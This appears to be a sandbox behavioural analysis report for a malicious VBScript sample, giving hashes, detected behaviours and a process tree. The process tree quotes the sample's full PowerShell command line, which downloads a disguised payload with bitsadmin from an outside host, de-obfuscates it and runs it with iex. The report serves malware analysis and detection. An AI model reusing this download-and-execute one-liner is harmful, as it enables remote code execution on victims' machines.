Resubmissions
Submitted            Analysis ID          Score
01/06/2023, 13:52    230601-q6laesee79    6
01/06/2023, 13:51    230601-q6be8aeh6y    6
01/06/2023, 13:49    230601-q4w9xaeh6v    6
01/06/2023, 13:48    230601-q4bcfaeh51    6
01/06/2023, 13:45    230601-q2vy3aee58    6
01/06/2023, 13:42    230601-qz6msaeh5t    7
25/05/2022, 10:04    220525-l3xrtsdfbm    7

Analysis
max time kernel: 55s
max time network: 63s
platform: windows10-1703_x64
resource: win10-20230220-en
resource tags: arch:x64, arch:x86, image:win10-20230220-en, locale:en-us, os:windows10-1703-x64, system
submitted: 01/06/2023, 13:42
Behavioral task behavioral1
Sample: fisc.vbs
Resource: win10-20230220-en

Behavioral task behavioral2
Sample: ykfoxibh.pdf
Resource: win10-20230220-en
General
Target: fisc.vbs
Size: 607B
MD5: 7e9280027235462727a9a351429725c6
SHA1: 380f1b3eeb2779a4359e4ca52471273983ed684c
SHA256: 11a9b5a24b628be56d2d2bedf1ed71f05114c2f670cd1814ff8f8ff222cd801a
SHA512: 7e31dcff6590b79476bb9bedd73145b9acafea62202d8defdd12608eae4cf727dce8781b83cd14d51432f2989bc6376c0a5bb8a114397c504a1ea4d519b4e060
Malware Config
Signatures

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Control Panel\International\Geo\Nation (process: WScript.exe)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Download via BitsAdmin (1 TTP, 1 IoC)
  PID 4688, bitsadmin.exe

Modifies registry class (1 IoC)
  Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance (process: WScript.exe)

Suspicious behavior: EnumeratesProcesses (3 IoCs)
  PID 1452, powershell.exe (listed three times)

Suspicious use of AdjustPrivilegeToken (1 IoC)
  Token: SeDebugPrivilege, PID 1452, powershell.exe

Suspicious use of WriteProcessMemory (6 IoCs)
  PID 2476 (WScript.exe) wrote to memory of PID 1484, procid_target 66 (listed twice)
  PID 1484 (cmd.exe) wrote to memory of PID 1452, procid_target 68 (listed twice)
  PID 1452 (powershell.exe) wrote to memory of PID 4688, procid_target 69 (listed twice)
Processes (indentation shows the parent/child tree)

C:\Windows\System32\WScript.exe (PID 2476)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fisc.vbs"
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\cmd.exe (PID 1484)
    Command line: "C:\Windows\system32\cmd.exe" /c powershell -c "&{bitsadmin /transfer orhwgxcl https://jopkerto.tech/avatar/6735/production.jpeg C:\Users\Admin\AppData\Roaming\production.jpeg; $ah=gc C:\Users\Admin\AppData\Roaming\production.jpeg; $ah -replace 'rfkvkhyy|wvgpmnbgx|xhbtegpohq|evvdwlxcd|gisofqvjp|edvdpyzc|uqbykfuhv' |iex }"
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1452)
      Command line: powershell -c "&{bitsadmin /transfer orhwgxcl https://jopkerto.tech/avatar/6735/production.jpeg C:\Users\Admin\AppData\Roaming\production.jpeg; $ah=gc C:\Users\Admin\AppData\Roaming\production.jpeg; $ah -replace 'rfkvkhyy|wvgpmnbgx|xhbtegpohq|evvdwlxcd|gisofqvjp|edvdpyzc|uqbykfuhv' |iex }"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\bitsadmin.exe (PID 4688)
        Command line: "C:\Windows\system32\bitsadmin.exe" /transfer orhwgxcl https://jopkerto.tech/avatar/6735/production.jpeg C:\Users\Admin\AppData\Roaming\production.jpeg
        - Download via BitsAdmin

C:\Windows\System32\rundll32.exe (PID 700)
  Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

\??\c:\windows\system32\svchost.exe (PID 5020)
  Command line: c:\windows\system32\svchost.exe -k localservice -s fdPHost
Network
MITRE ATT&CK Enterprise v6
Downloads

Filesize: 1B
MD5: c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Filesize: 652B
MD5: 671edceeceed4b8d01725b17bb334014
SHA1: f1b1e5909d6cb622c6133c92c775e022c7fb0edb
SHA256: 93d8ed1c1a490a5384e0d19a399e95b60f67880af242cf77955e8f53202adcf8
SHA512: 1ff5f1549a01cb21e7ab285acd9c4fea328693a66375f5effbd89f577c4557b4a7eb4722de8d084b46012fce3d05bfe2f42ba639f895e2d089bc52db517d8722